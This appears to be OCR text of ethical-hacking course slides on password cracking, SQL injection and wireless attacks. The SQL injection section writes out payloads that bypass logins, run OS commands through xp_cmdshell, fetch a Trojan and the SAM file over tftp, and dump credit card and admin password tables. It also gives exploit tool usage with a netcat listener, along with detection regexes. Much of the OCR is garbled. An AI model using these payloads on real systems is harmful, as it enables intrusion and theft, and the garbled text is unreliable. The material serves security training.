Tent of Window Under 'Circled +' Cursor (if available) 



J. 

Copy to clipboard | 



Status 

Revelation idle. 



Reposition Revelation out of the way when dragging 'circled 
r When minimized., put in System Tray 



Length of available text: 0 



! Always on top 
Hide 'How to' instructions 



How to 

1 ) Left click and drag (while holding down the left mouse button) the 'circled +' 

2) As you drag the 'circled +' cursor over different fields on various windows, the tent in the field 
under the cursor will be displayed in the 'Tent of Window...' box. 

3) Release the left mouse button when you have revealed the text you desire. 

NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be 
shown. In some cases the text may actually be asterisks. 

NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check 
the status light for availability of text. 

Bright green = text available (See 'Length of text:' in Status area) 

Bright red = no text available 
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Hacking Tool: WinSSLMiM 



! 

http:// www.securi tei nfo.com/ outi Is/ Wi nSSLM i M .shtml 

© WinSSLMiM isan HTTPS man- in-the- middle 
attacki ng tool . 1 1 i ncl udes FakeCert, a tool to make 
fake certificates. 

© 1 1 can be used to exploit the Certificate Chai n 
vulnerability in I nternet Explorer. The tool works 
under Windows 9x/2000. 

© Usage: 

- FakeCert: fc-h 
-WinSSLMiM: wsm-h 
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"Mary Had A Little Lamb" Formula 



I 




Consider a sentence: 

"Mary had a littlelamb. The 
lamb had white fleece." 

1 Consi der the f i rst I etter of 
each word, i.e.: 
MHALLTLHWF 

2. Every second I etter of the 
abbreviation can be put in 
the lower case, i.e.: 
MhAILtLhWf 

3. Replace "A" with "@" and 
"L" with "!". Thus, anew 
alphanumeric password 
with more than eight 
characters wi 1 1 be formed. 

4. New Password: Mh@l!t!hWf 
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Picture Source: 

http://www.gypcnme.com/ ceramic%20arts 
%20Mary%20Had%20Lamh ''^ 
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Countermeasures 



I 



© Passwords chosen should have at least eight 
characters 

© Passwords shoul d have a combi nati on of I owercase 
and capital letters; numbers; special characters; etc. 

© Words which can beeasilyfound in a dictionary 
should not be used as passwords 

© Public information such as social security number, 
credit card number, ATM card number, etc. should 
not be used as passwords 

© Personal i nformation should never be used as 
passwords 

© User names and passwords should be different 
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© Managers and administrators can enhance the 
security of thei r networl<s by setti ng strong password 
policies. Password requirennents should be built into 
organizational security policies. 

© Systems ad mi ni strators shoul d i mpl ement 
safeguards to ensure that peopi e on thei r systems are 
usi ng adequately strong passwords. 

© When i nstal I i ng new systems, it should be made sure 
default passwords are changed immediately. 
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Countermeasures 



I 



© The user can use the SRP protocol. SRP is a secure 
password- based authentication and l<ey-exchange 
protocol . 1 1 solves the problem of authenticati ng 
cl i ents to servers securely, where the user of the cl i ent 
software is requi red to memorize a smal I secret (I i ke a 
password) and carries no other secret information. 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



Summary 



© Authenti cati on i s the process of checki ng the i denti ty 
of the person claiming to bethe legitimate user 

© HTTP, NTLM, Negotiate, Certificate- Based, Forms- 
based, and M icrosoft Passport are the different types 
Of Authentications 

© Password crackers use two pri mary methods to 
identify correct passwords: brute force and dictionary 
searches 

© LOphtcrack, J ohn The Ripper, Brutus, Obiwan, etc. 
are some of the more popular password cracki ng tools 
aval I able today 

© The best technique to prevent the cracking of 

passwords is to have passwords which are more than 8 
characters and to incorporate upper and lowercase 
alphanumeric, as well as special characters, into them 

Copyri ght © by BC-Cbunc i I 
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Ethical Hacking 



ModuleXIV: 
SQL I njection 



Scenario 



© When the university imposed new 
rules for its admission program, the 
students opposed in unison. Their 
demands went unheeded and the 
rules were to be enforced from the 
start of the new academic year 

© J ohnny, the student's representative, 
deci ded to str i ke back and voi ce thei r 
protest through the university 
website 

1 What can be in J ohnny'smind? 

2. What can J ohnny do to increase 
the reach of the protests? 
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Module Objective 



© What is SQL injection? 

© Steps to conduct SQL injection 

© Using SQL I njection techniques to gain access 
to a system 

© SQL injection in Oracle 

© SQL injection in IvjySql 

© Attacl<ing SQL servers 

© SQL injection automated tools 

© Prevention and counter measures 
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Modu eF ow 



What i s SQL i nj ecti on 



Steps to conduct SQL 



^ SQL injection techniques 



SQL injection automated ^ SQL injection in MySQL ^ _SQL injection in Oracle 
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What is SQL I njection? 



L 



© It is a technique of injecting SQL commands to 
exploit non-validated input vulnerabilities in a 
web application database back end 

© Programmers use sequential commands with 
user input, making it easier for attackers to 
inject commands 

© Attackers can execute arbitrary SQL commands 
through the web application 
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Expl oi ti ng Web AppI i cati ons 



© Exploits web applications that use 
client- supplied sql queries 

© 1 1 enables an attacker to execute 
unauthorized sql commands 

© Takes advantage of unsafe queri es i n 
web applications and builds 
dynamic sql queries 

For example, when a user logs in to a web 
page using user nanneand password for 
validation using sql query, with sql injection 
it is possibleto send specially crafted user 

nanne and password f i el ds that wi 1 1 poi son 

the sql query 
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SQL Injection Steps 



I 



© What do you need? 

• Any web browser 



EC-Council | Login - Microsoft Internet EKpIc 



File Edit Viei/v Favorites Tools Help 



4ap 



Back - - I x] I si] ■■ ^ y- ' Search 'S^^ Favorites Media 



Address http://eccouncil.orgyLogin.htn 



Go Links 



EC-Council 

X nter n ation a I Council of E-Commerce Coi 

Hcnne Certification^ 



isultants 



Education \^ 



Forgot P^assword? Need Help? 



Headline 



Member Login 



Example of a l_osin P^S^ 




Member Login Area 



Please login with your Pfometric Prime Username and Password. 



Username 



PassiATord 



Logm I 



Forgot Password 



I nput validation attacl< occurs liereon a website 
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What You Should Look For 



© Try to look for pages that allow to submit data, for 
example login page, search page, feedback, etc. 

© Look for HTM L pages that use POST or GET command 

© I f POST is used you cannot see the parameters i n the 
URL 

© Check the source code of the HTM L to get i nformation 

• For example, to check whether it is using POST or GET, check 
the <Form> tag in the source code 

<Form act ion=search . asp method=post > 
<input type=hidden name=X value=Z> 
</Form> 
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What I f 1 1 Doesn't Take I nput? 



© If input is not given, check for pages I ike ASP, 
JSP, CGI, or PHP 

© Check the URL that takes parameters 

• Example 

- http:// www.xsecurity.com 
/index . asp?id=10 

• I n the above exampi e, attackers wi 1 1 attempt 

- http : / / www . xsecurity . com/ index . asp? id 
=blah'' or 1 = 1 — 
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OLE DB Errors 



The user-filled fields are enclosed by single quotation 
marks ( ') . A si mpl e test woul d be to try usi ng ( ') as the user 
name 

The foil owing error message will be displayed when a (') is 
entered i nto a form that i s vul nerabi e to SQL i nj ecti on 



Microsoft OLE DB Providerfor ODBC Drivers 
error '80040e1 4' 

[Microsoft][ODBC Microsoft Access Driver] Extra) 
in queiy expression 'Userid='3306') or ('a -'a' 
AND Password="'. 

/_bool<ing/login3.asp, line 49 



If this error is displayed, then SQL injection 
techniques can be tried 
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I n put Val i dati on Attack 



-^EC-Council | Login - Mi croEoFt Internet Euplorer 



-Inl ^1 



File Edit VieiAi Favorites Tools Help 



Back y - |V] Search Favorites Media 



□ 



Address |^ http;//e ccouncil.org/Login. htm 



~Z] 13 ^° Links 



EC-Council 

InteriiBtional Council of E-Commerce Consultants 

GarHfica.t1an\ Education \j 




Forgot Password? Need Help? 




Headline 



Member Login 



Example of a Login Page 




Metnber Lagin' Area 



Please login V\iith your Prometric Prime Username and Passovord. 



Username 
Password 



1^ 




Forgot Passv/ord 



J 



Internet 



I nput val idation attack occurs here on a website 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



SQL I njection Techniques 



© The foil owing are SQL injection 
techniques 

• Authorization bypass 

- By bypassing logon fornns 

• Using the SELECT command 

- Used to retrieve data fronn the 
database 

• Using the INSERT command 

- Used to add infornnation to the 
database 

• Using SQL server stored 
procedures 
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How to Test if it is Vulnerable? 



© Use a single quote in the input: 

blah' or 1=1— 
Loginiblah' or 1=1— 
Password : blah' or 1=1— 

http : / / search/index . asp?id=blah' or 1=1 — 

© Depending on the query, try the foil owing 
possi bilities: 

^ or 1=1 — 
- or 1 = 1 — 

^ or ''a' = ^a 
. or ^^a"=''a 

^ ) or ( ''a' = ''a 
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Executi ng Operati ng System 
Commands - 1 



© Use Stored procedures I ike master . .xp_cmdsheii to 
perform remote execution 

© Execute any OS commands here 

• blah \* exec master .. xp_cmds he 11 ''''insert OS 
command here'' — 

© Ping a server 

• blah''; exec master .. xp_cmdshell ''''ping 
10.10.1.2'' — 

© Directory listing 

• blah''; exec master .. xp_cmdshell ''''dir c:\'^.'^ /s 
> c:\directory.txt" — 

© Create a file 

• blah''; exec master .. xp_cmdshell ""^echo juggyboy-was- 
here > c:\juggyboy.txt" — 
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Executi ng Operati ng System 
Commands - 2 



© Defacing a web page (assuming write access all owed due to 
misconfiguration) 

• blah \* exec master .. xp_cmdshe 11 ''''echo you-are- 
defaced > c:\inetpub\www.root\index.htm'''' — 

© Executeapplications(only non-gui app) 

• blah\*exec master .. xp_cmds he 11 ''''cmd.exe /c 
appname . exe'' — 

© U pi oad a Troj an to the server 

• blah\*exec master .. xp_cmdshell ''''tftp -i 10.0.0.4 
GET trojan.exe c:\trojan.exe'''' — 

© Download afilefromtheserver 

• blah\*exec master .. xp_cmdshell ''''tftp -i 10.0.0.4 
put c:\winnt\repair\SAM SAM'' — 
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L J 



Getti ng Output of sql Query 



©Use sp_ makewebtask to write query i nto an HTM L 
• Example 

blah \* EXEC master. . sp_makewebtask 

''''WlO.lO.l. 4 \ share \ credit card . html", 

''SELECT ^ FROM CREDITCARD'' 

The above command exports credit card table to attacker's 
network share 
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Getti ng Data from the Database Usi ng 
ODBC Error Message 



© Using UNI ON keyword 

• http : / /xsecurity . com/index . asp?id=l 0 UNION 
SELECT TOP 1 TABLE_NAME FROM 
INFORMATION_SCHEMA. TABLES — 

• To retrieve i nformation from the above query use 

SELECT TOP 1 TABLE_NAME FROM 
INFORMAT I ON_S CHEMA . TABLE S — 

© Using LIKE l<eyword 

• http:// xsecurity.com /index . asp?id=l 0 UNION 
SELECT TOP 1 TABLE FROM 

INFORMATION_SCHEMA. TABLES WHERE TABLE_NAME 
LIKE '%25LOGIN%25' — 
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How to Mine all Column Names of a 
Table? 



© To map out all column names of a table, type 

• http : / /xsecurity . com/index . asp?id=l 0 UNION 
SELECT TOP 1 COLUMN_NAME FROM 
INFORMATION_SCHEMA. COLUMNS WHERE 
TABLE_NAME= 'admin_login' — 

© To get the next column name, use NOT I N( ) 

• http:// xsecurity.com /index . asp?id=10 UNION 
SELECT TOP 1 COLUMN_NAME FROM 
INFORMATION_SCHEMA. COLUMNS WHERE 

TABLE_NAME= 'admin_login' WHERE COLUMN_NAME NOT 
IN ( 'login_id' ) — 
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H ow to Retrieve any Data? 



© To get the I ogi n_ name from the "admi n_ I ogi n " tabi e 

• http:// xsecurity.com /index . asp?id=l 0 UNION 
SELECT TOP 1 login_name FROM admin_login — 

© F rom above, we get I ogi n_ name of the admi n_ user. 
© To get the password for logi n_ name=yuri ' -- 

• http'V/ xsecurity.com /index . asp?id=l 0 UNION 
SELECT TOP 1 password FROM admin_login where 
login_name= ""yuri' — 
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H ow to U pdate/ 1 nsert Data i nto 
Database? 



© After gathering all column name of a table, it is possible 
to UPDATE or I NSERT records in the table 

• Example to change password for 'yuri': 

• http:// xsecurity.com /index . asp?id=10 ; UPDATE 
''admin_login' SET ''password' = ''newboyS' WHERE 
login_name= ""yuri' — 

© To I N SE RT a record 

• http:// xsecurity.com /index . asp?id=l 0 ; INSERT 
INTO '*admin_login' ( '*login_id' , ' login_name' , ' pas 
sword' , ' details' ) VALUES (111, ' yuri2' , ' newboyS' , 
'NA' ) — 
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Absinthe Automated SQL I njection 
Tool 



K-Council 



File Tools Help 



HoEt Information DB Schen-i^* | D ownload Records 

E xplort Type: 

Select the type esf injection: (*) Blind Injection Error Based 

Select Tlie Tarciet Dartabase: 



PostgreSCJL 



C esnnectiesn: - 



Target URL: httpift | internal. 0x90. org^—nummisl-Vsql.php 



Connection Method: 



f* Get C Post I Use SSL 



I C omment E nd of O uery | Append text to end of query 



Authentication— 



I Use Authentication Name: ^ 

O Basic O Digest O NTLM Password: T 



Form Parameters: 



N a me: | 

Default Value: | 
I li-ijectable P arai-i-ie±er 
I Treat Value as String 
Add Parameter Add Cookie 



Pai'an-ie±ers | Cookies | 












Nai-r~ie 1 V.alLie | Injectable 




Edit 




id 2 True 








Remove 




^1 1 K 





Initialize Injection 
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SQL I njection in Oracle 



© SQL injection in Oracle can be performed as 
follows: 

• UNIONS can be added to the exi sti ng statement to 
execute a second statement 

• SU BSE LE GTS can be added to exist! ng statements 

• Data Definition Language (DDL) can be injected if 
DDL is used in a dynamic SQL string 

• I NSERTS, UPDATES, and DELETES can also be 
injected 

• Anonymous PL/ SQL blocks in procedures 
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SQL I njection in MySql Database 



© I t's not easy to perform SQL i nj ecti on i n M ySql 
database 

© While coding with MySql application, the 
injection vulnerability is not exploited 

© I t's difficult to trace output 

© You can see an error because the value retrieved 
is passed to multiple queries with a different 
number of col umns before the scri pt ends 

© In such situations, SELECT and UNION 
commands cannot be used 
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SQL I njection in MySql Database 



© Example: consider a database 'pizza': 

• http : / / www .xsecurity. com/ pizza/ index . php?a=post & s = 
reply&t=l ' 

• To show thetables type the query: 

mYsql> SHOW TABLES; 

• To see the current user: 

mYsql> SELECT USER ( ) ; 

• Foil owi ng query shows the f i rst byte of Ad mi n's H ash: 

mYsql> SELECT SUBSTRING (user_pas sword, 1 , 1 ) FROM mb_users 
WHERE user_group = 1; 

• Followingqueryshowsfirstbyteof Admin's Hash as ASCI I number: 

mysql> SELECT ASCII('5'); 
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SQL I njection in MySql Database 



© Prepari ng the GET Request 

• To inject SQL commands successfully we have to clean the request 
from any si ngl e quote 

mYsql> Select active_id FROM mb_active UNION 
SELECT IF (SUBSTRING (user_password, 1, 1) = CHAR (53), 
BENCHMARK (1000000, MD5 (CHAR ( 1 ) ) ) , null) FROM 
mb_users WHERE user_group = 1; 

© Exploiting the Vulnerability 

• First, log in a Registered User with the rights to reply in the current 
thread 

http ://127. 0.0.1 /pi z za/ index . php?a=post &s=replY&t = l 
UNION SELECT IF ( SUBSTRING (user_password, 1 , 1 ) = 
CHAR (53), BENCHMARK (1000000, MD5 ( CHAR ( 1 ) ) ) , null), 
null, null, null, null FROM mb_users WHERE 
user_group = 1/* 

You wi 1 1 see a si ow down of a coupl e of seconds because the f i rst 
byteisCHAR(53), 5 
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Attack Agai nst SQL Servers 



© Techniques I nvolved 

• Understand SQL Server and extract neiessary 
information from the SQL Server Resolution Service 

• List servers by OsqI-L probes 

• Sc.exesweeping of services 

• Port scanning 

• Use of commercial alternatives 
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SQL Server Resolution Service (SSRS) 



©This service is responsible for sending a 
response packet containing connection details 
of cl ients who send a special ly formed request 

© The packet contai ns the detai Is necessary to 
connect to the desi red i nstance, i ncl udi ng the 
TCP port for each i nstance 

© The SSRS has buffer overflow vulnerabilities 
that al low remote attackers to overwrite 
portions of system memory and to execute 
arbitrary codes 
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Osql L- Probing 



© It is a command-line utility provided by 
M icrosoft with SQL Server 2000 that allows the 
user to issue queries to the server 

© OsqI.exe includes a discovery switch (-L) that 
wi II pol I the network looki ng for other 
i nstal I ati ons of SQL Server 

© OsqI.exe returns a list of server names and 
i nstances but no detai Is about TCP ports or 
netl i bs 
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SQL I njection Automated Tools 



© SQLDict 

© SqlExec 

© SQLbf 

© SQL Smack 

© SQL2.exe 

© AppDetective 

© Database Scanner 

© SQLPoke 

© NGSSQLCrack 

© NGSSQuirreL 

© SQLPingv2.2 
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Hacking Tool: SQLDict 



http : / / nt security . nu/ cgi- 
bin/ download/ sqldict . exe . pi 

©SQL diet is a dictionary attacl< tool 
for SQL Server 

©It tests if the accounts are strong 
enough to resist an attack 







SQLdict 2.1 - The SQL Server Dictionarv Attacker 

copyright (c) 2000.. Arne Vidstrom 
arne.vidstronn@ntsecuritv.nu ■ http:/'/ntsecuritv.nu 




Target server IP: || 
Target account: | 

Load Password File | 










Start 1 Stop 1 Exit | 


















t 
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Hacking Tool: SQLExec 



I 



©http : / / phoenix . liu . edu/~mdevi/ ut il/ Intro . htm 

©This tool executes commands on compromised M icrosoft SQL Servers 
usingxp_cmdshell stored procedure 

©It uses default sa account with N U LL password 

©USAGE: SOLExecwww.target.com 



C:\WINDOWS\System32\cmd.exe 



C:\Docunents and Settinsfs\Ouner\MiF Docunents\Ethical Hacking Lab Files v2\Module 
14 — SQL In jection\sqlexec>sqlexec 

SQLExec 1.0 for Windows NT/2K/9X 

By Egenen Tas <Send all feedbacks and bug reports to egenenl^btkon . con> 

Usage : SQLExec <Hostnane> 

MM<Do not use ip addresses of targets>MM 

C:\Docunents and Sett ings\Owner\Mv Docunents\Ethical Hacking Lab Files u2\Module 
14 — SQL In jection\sqlexec> 
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I 



http : / /www . cqure . net /tools . j sp?id=l 0 

© Sqibf is a SQL Sever Password Auditing tool. This tool should 
be used to audit the strength of M icrosoft SQL Server 
passwords offline. The tool can be used either in BruteForce 
mode or in Dictionary attack mode. The performance on a 
IGHZ Pentium (256M B) machine is around 750,000 
guesses/ sec. 

© To be able to perform an audit one needs the password hashes 
that are stored i n the sysxl ogi ns tabi e i n the master database. 

© The hashes are easy to retrieve, although one needs a privileged 
account to do so, I ike an sa account. The query to use would be: 

select name,- password from master .. sysxlogins 

© To perform a dictionary attack on the retrieved hashes: 

sqlbf -u hashes.txt -d dictionary . die -r 
out . rep 
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Hacking Tool: SQLSmack 



© SQLSmack is a Linux-based Remote Command 
Execution for MSSQL 

© When provided with a valid user name and password, 
the tool permits execution of commands on a remote 
M S SQL Server by pi pi ng them through the stored 

procedure master . . xp_cmdshell 
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L i 



Hacking Tool: SQL2.exe 



© SQL2 is a U DP Buffer Overflow Remote Exploit hacking 
tool 



^ C:\WINDOWS\System32kmd.exe 



G : \DDCunen ts and Set t ings\Owner\Desktop\Explo it s\Explo its_l\Explo its >sql2 

SQL Seruer UDF Buffer Ouerflow Remote Exploit 

lodified from "Oduanced Uindows Shellcode" 
Code by Dauid Litchfield, dauidl^ngssof tware .com 
lodified hy lion, f ix a bug. 

[Jelcome to HUC Uebsite bttp://uuu. cnbonker.com 
Jsage : 

sql2 Target [<NCHost> <NCPort> <SQLSP>] 
Exemple : 

Target is MSSQL SP 0: 
C:\>nc -1 -p 53 

C:\>sql2 db. target .com 202.202.202.202 53 0 
Target is MSSQL SP 1 or 2: 

c:\>sql2 db.target.com 202.202.202.202 

C : \Documen ts and Set t ings\Owner\Desktop\Explo it sNExplo its_l\Explo its > 
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SQL I njection Countermeasures 



© Selection of Regular Expressions 

• Regular expressions for detection of SQL meta 
characters: 

- / (\%27) I (\' ) I (\-\-) I (\%23) I (#) /ix 

• The above regular expression would be added to the snort rule 
as follows: 

- alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 
$HTTP_PORTS (msg:"SQL Injection - Paranoid"; 
flow : to_server , established; uri content : " . pi " ; 
pcre: "/ (\%27) | (\') | (\-\-) | (%23) | (#)/i"; 
class type : Web-application-attack; sid : 9099; 
rev: 5; ) </TD< tr> 

• Since is not an HTM L meta character, it will not be 
encoded by the browser 
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SQL I njection Counter measures (cont.) 



• Modified regular expressions for detection of SQL 
meta cliaracters 

-/((\%3D) I ( = )) [^\n] ^ ( (\%27) I (\M I (\-\- 
) I (\%3B) I (; ) ) /i 

• Regular expressions for typical SQL injection attack 

- /\w* ( (\%27) I (\') ) ( (\%6F) |o| (\%4F) ) ( (\%72) |r| ( 
\%52) ) /ix 

\w* -zero or more al phanumeri c or underscore characters 

(\%27) I \ ' -the ubiquitous single-quote or its hex equivalent 

(\%6F) joj (\%4F)) ((\%72) jrj (\%52) -theword 'or' 
with various connbi nations of its upper and lower case hex 
equivalents 
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SQL I njection Countermeasures (cont.) 



• Regular expressions for detecting SQL injection using UNI ON 
keyword 

- / ( (\%27) I (\ ' ) ) union/ix 

(\%27)|(\') - the single-quote and its liex equivalent 
union - the keyword union 

- Above expression can be used for SELECT, I NSERT, UPDATE, DELETE, 
and DROP keywords 

• Regular expressions for detecting SQL injection attacks on a 
M S SQL server 

- /exec ( \s I \+) + ( s I x) p\w+/ix 

exec -the keyword requi red to run the stored or extended procedure 

(\s I \+)+ -one or morewhitespaces or their HTTP encoded equivalents 

(s I x) p -the letters 'sp' or 'xp' to identify stored or extended procedures, 
respectively 

\w+ -one or more alphanumeric or underscore characters to complete the 
name of the procedure 
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Preventive M easures 



© M i n i mi ze pri vi I eges of database con necti on 
© Disable verbose error messages 
© Protect tine system account 'sa' 
© Audit source code 

• Escape single quotes 

• Input validation 

• Reject known bad input 

• Input bound checking 
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Summary 



© SQL injection is an attacl< methodology that targets the 
data residing in a database 

© 1 1 attempts to modify the parameters of a web- based 
applicat on in order to alter the SQL statements that are 
parsed to retrieve data from the database 

© Database f ootpri nti ng i s the process of mappi ng out the 
tables on the database and is a crucial toof in the hands 
of an attacker 

© Exploits occur due to coding errors as well as 
inadequate validation checks 

© Preventi on i nvol ves enforci ng better codi ng practi ces 
and database administration procedures 
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Ethical Hacking 



Module XV 

H acki ng Wi rel ess N etworks 



Scenario 



I 



® A prankster used the speakers at the food j oi nt to make personal 
and offending statements about the customers who came to pick up 
thei r orders from the counter. Somethi ng was very wrong with the 
speaker system. 

©The management of the Snack Bar had a difficult time calming the 
furious customers. Even their most loyal customers were extremely 
offended. A lot of business was being lost resulting in big financial 
losses for the Snack Bar. 

© The results of a police investigation totally surprised the Snack Bar 
management. Upon investigation, the Officers found that the culprit 
was an ex-employee who was fired for indecent behavior with a 
customer. Itwasaclear example of wireless hacking, where the 
hacker tapped i nto the wi reless frequency of the speaker system. 

© What if the same thing were to happen to a radio broadcasting 
organization? Can you imagine the ramifications? 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 




I 



© Wi rel ess N etworki ng Concept 

© Effect on Busi ness of Wi rel ess Attacks 

© Basi cs of Wi rel ess N etworks 

© Componentsof a Wireless LAN 

© Typesof Wireless Networks and Setting Up a WLAN 

© Detecti ng and Getti ng i nto a WLAN 

© Access Point Positioning and Antennas 

© SSI Ds, WEP, Related Technologies, and Carrier Networks 

© MacSniffingandAP Spoofing 

© Different Types of Wi rel ess Attacks (Such as DoS or M I TM ) 

© Hacking Tools 

© WIDZandRADIUS 
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Module Flow 



Introduction 



Business and 
Wire! ess Attacl<s 



^ Components of a 
Wireless Network 



Rogue Access Points ^ HowtoSetUpaWLAN ^ 




Networks 



n A n ■ ^ ■►WhatisWEP? ► 

Rogue Access Points WEP 



^ MAC Spoof i 



ng 




DOS Attack Tool s^" DOS Attack m 



MAC Spoofing 



Scanning Tools ^ Sniffing Tools 



WIDZ 



Counter measures 
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I ntroduction to Wireless Networking 



I 



© Wireless networking technology is becoming 

i ncreasi ngly popul ar and at the same ti me has i ntroduced 

several security issues. 

© The popularity of wireless technology is driven by 
two primary factors: convenience and cost. 

© A wireless local area network (WLAN) allows workers 
to access digital resources without being locked to their 
desks. 

© Laptops can betaken to meetings, or even to Starbucks, 
and connected to a wireless network. This convenience 
has become more affordable. 
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Busi ness and Wi reless Attacks 



© As more and more firms use wireless networks, 
security becomes more of a problem. 

© Business is at high risk from whackers (wireless 
hackers) who don't require physical entry into a 
business network to hack, but can easily 
compromi se the network wi th the hel p of f reel y 
aval I able tools. 

© Warchalking, Wardriving, and Warflying are 
some of the ways i n which a whacker can assess 
the vul nerabi I ity of a fi rm's network. 
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Basics 



The f i rst wi rel ess standard was 802. 11 1 1 defi nes three 
physical layers: 

• Frequency Hopping Spread Spectrum (FHSS) 

• Direct Sequence Spread Spectrum (DSSS) 

• Infrared 

© 802.11a: More channels, high speed, less interference 

©802.11b: Protocol of Wi-Fi revolution, De Facto Standard 

©802.iig: Similar to 802.11b, only faster 

© 802.iii: improves WLAN security 

© 802.16: Long distance wireless infrastructure 

© Bluetooth: Cable replacement option 

© 900 MHz: Low speed, coverage, backward compatibility 
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Components of a Wi reless Network 



There are three 
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Types of Wi rd ess N etworks 



There are four basic types: 

• Peer to Peer 

• Extension to a wired networl< 

• jviuiti pie access points 

• LAN to LAN wireless networl< 

! 
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Setting Up a WLAN 



© When setting up a WLAN, the channel and service set 
identifier (SSI D) must be configured in addition to 
traditional network settings such as I P address and a 
subnet mask. 

© The channel is a number between land 11 (between 1 
and B in Europe) and designates the frequency on 
which the network wi 1 1 operate. 

© The SSI D is an alphanumeric string that differentiates 
networks operati ng on the same channel . 

© 1 1 is essentially a configurable name that identifies an 
i ndi vidual network. These setti ngs are i mportant factors 
when identifying WLAN sand sniffing traffic. 
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© Usi ng an operati ng system, 
such as Windows XP or Mac 
with Ai rport, to detect 
available networl<s. 

© Using handheld PCs (Tool: 
MiniStumbler) 

©Using passive scanners 
(Tool: Kismet, KisMAC) 

© Usi ng active beacon 
scanners (Tool: NetStumbler, 
MacStumbler, iStumbler) 
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© Usea laptop with a wireless NIC (WNIC) 

© Configure the N I C to automatically set up its I P 
address, gateway, and DNS servers 

© U se the software that came wi th the N I C to 
automati cal ly detect and go onl i ne 

© One of the ways to check if the system is onl i ne is to run 
an intrusion detection system 

© An I DS alerts when the device gets any ki nd of network 
traff i c 

© An easier way is to fi nd access poi nts (AP) by runni ng a 
software such as Wi Fi Finder or NetStumbler 
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Advantages and Disadvantages of a 
Wireless Network 



© Advantages are: 
Mobility 

Cost-effective i n tine 
initial phase 

Easy connection 

Different ways to 
transmit data 

Easy sharing 



© Disadvantages are: 

• Mobility 

• H i gh cost post- 
implementation 

• No physical 
protection of 
networks 

• H acki ng has become 
more convenient 

• Risk of data sharing is 
high 
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Antennas 



I 



© Antennas are very i mportant 
for sending and receiving radio 
waves. 

© They convert electrical 
impulses into radio waves and 
vice versa. 

© There are two types of 
antennas: 

• Omni-directional antennas 

• D i recti onal anten nas 

© Can antennas are also very 
popular in the wireless 
community and are used mostly 
for personal use. 
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I 



© The SSI D is a unique identifier that wireless 
networ ki ng devi ces use to estabi i sh and mai ntai n 



© SSI D acts as a single shared identifier between 
access points and clients 

© Security concerns arise when the default values are 
not changed, as these units can be easily compromised 

© A non-secure access mode allows clients to connect 
to the access point using the configured SSI D, a blank 
SSI D, or an SSI D configured as "any" 



wireless connectivity 
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Access Point Positioning 



■ 



©An access poi nt i s a pi ece of wi rel ess 
communications liardware tliat creates a 
central poi nt of wi rel ess connectivity 



© Wi rel ess access poi nts must be deployed 
and managed in common areas of the 
campus and they must be coordi nated with 
Telecommunications and Network 
M anagers. 



© Similar to a "hub," the access point is a 
common connection point for devices in a 
wi rel ess network. 
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Rogue Access Poi nts 



©A rogu^ unauthorized access point is 
one that is not authorized for operation 
by a particular firm or networl< 

©Tools that can detect 

rogu^ unauthorized access points 

include NetStumbler and MiniStumbler 

©The two basic methods for locating 
rogue access poi nts are: 

• Beacon i ng/ requesti ng a beacon 

• Network Sniffing: Looking for 
packets i n the ai r 
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Tools to Generate Rogue Access 
Points: FakeAP 



© FakeAP provides the means of hiding in plain sight, 
nnal<ing it unlil<ely for an organization to be 
discovered 

© Fal<eAP confuses Ward rivers, NetStumblers, Script 
Kiddies, and other undesirables 

© Black Alchemy's FakeAP generates thousands of 
counterfeit 802.11b access poi nts 

© FakeAP is a proof of concept released under the GPL 

© FakeAP runs on Linux and BSD versions 
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Tools to Detect Rogue Access Points: 
Netstumbler 



© Netstumbler is a Windows 
utility for WarDriving written by 
MariusMilner. 

© Netstumbler is a high level 
WLAN scanner. It operates by 
sendi ng a steady stream of 
broadcast packets on all possible 
channels. 

© Access points (AP) respond to 
broadcast packets to verify thei r 
existence, even if beacons have 
been disabled. 

© Netstumbler displays: 

• Signal Strength 

• MAC Address 

• SSID 

• Channel details 
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Tools to Detect Rogue Access Points: 
Ministumbler 



© Ministumbler istlie 
smal I er si bl i nq of a free 
Droduct callea 
MetStumbler. 

© By default mostWLAN 
access poi nts(APs) 
broadcast thei r Service Set 
I dentifier (SSI D) to anyone 
who will listen. This flaw in 
WLAN is used by 
Ministumbler. 

© 1 1 can connect to a global 
positioning system (GPS). 




Ministumbler 
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What Is Wired Equivalent Privacy 
(W EP)? 



© WEP is a component of the I EEE 802.11WLAN 
standards. I ts primary purpose is to provide for 
conf i denti a! i ty of data on wi re! ess networ l<s at a I eve! 
equivalent to that of wired LANs. 

© Wired LANs typically employ physical controls to 
prevent unauthorized users from connecti ng to the 
network and viewi ng data. I n a wi reless LAN , the 
network can be accessed without physically connecting 
to the LAN . 

©IEEE chose to empi oy encrypti on at the data I i n k I ayer 
to prevent unauthorized eavesdropping on a network. 
This is accomplished by encrypting data with the RC4 
encryption algorithm. 
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WE P Tool : Aircrack 




aircrack 2.1 - <C!) 2004 Christophe Deuine 



S 
4 
3 
2 
1 

0 

-> _ 



usage: aircrack <pcap f ilenane <s > > 



debug - specify beginning of the key 
bruteforce fudge factor <current: 2> 
packet nnC filter: 00:00:00:00:00:00 
UEP key length in bits, current: 128 
read lUs fron a specified pcap file 
start cracking <with 0 WEP IUs> 



802. 11 sniffer and WEP key cracker 
Recovers 40-bit or 104-bit WEP key 
I mplements Fivi S attack with some new attacks 
Supports Windows, Linux, and l^iacOS 
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WEPTool: AirSnort 



I 



©AirSnort is a wireless LAN (WLAN) tool 
which recovers encryption keys on 802.11b 
WEP networks 

©Ai rSnort operates by passively monitori ng 
transmi ssi ons, computi ng the encrypti on 
key when enough packets have been 
gathered 

©AirSnort runs under Linux, and requires 
that the wi reless N I C be capable of rf 
monitor mode, and that it pass monitor 
mode packets up via the PF_ PACKET 
i nterf ace 




http://airsnort.shmoo.com/ 
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WEPTool: WEPCrack 



I 



© WEPCrack is an open source tool for breaking 802.11 
WEP secret keys 

© Thistool is is an implementation of the attack described 
by Fluhrer, Mantin, and Shamir in the paper 
"Weaknesses in the Key Scheduling Algorithm of RC4" 

© WhileAirSnort has captured the media attention, 
WE PCrack was the f i rst publ i cly aval I able code that 
demonstrated the above attack 

© The current tools are Perl -based and are composed of 
the f ol I owi ng scri pts: 

• WeaklVGen.pl 

• prism- getlV.pl 

• WEPCrack.pl 



wepcrack.sourceforge.net/ 
